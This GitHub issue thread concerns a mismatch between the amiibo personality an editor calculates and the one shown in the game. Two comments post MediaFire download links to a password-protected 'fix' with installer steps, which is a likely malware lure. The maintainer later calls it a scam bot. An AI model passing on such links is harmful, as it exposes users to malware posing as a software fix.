### ISSUE TITLE
Amiibo personality shows up as Normal in the editor, but shows up as Show-Off in the game. Is taunt value registering in the personality calculation for this program?

### ISSUE THREAD

**Issue by ShizukaKitakami55** [jozz024/smash-amiibo-editor#18]
I had a similar case where I had a supposed "Thrill Seeker" personality amiibo, but it shows up as "Flashy" in the game.
Does the "Taunt" value register for the Personality calculated in this program? Uploaded images and a zip containing the mr game and watch bin.
Nice program, by the way!
![image](https://github.com/user-attachments/assets/cd7010a3-90fc-42c3-93d7-f7a2aa0f13bc)
![IMG_4643](https://github.com/user-attachments/assets/94ea26fe-5c73-4523-9b0d-12a3e9a6e528)
[socalled normal amiibo.zip](https://github.com/user-attachments/files/16778081/socalled.normal.amiibo.zip)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jozz024** [comment]
This is an issue with our current personality calculation code, but there are calculations possible on the switch that aren't on a normal computer that make it almost impossible for us to have 1-1 personality calculation. I appreciate you sending us the bins though, it truly does help with our research on the matter. Also, the person that previously responded to you was a scam bot, please do not do anything as they directed.

**Comment by ShizukaKitakami55** [comment]
Thanks for acknowledging it (and deleting the comment that I never got to read but am glad I didn't)
Good luck with polishing this program
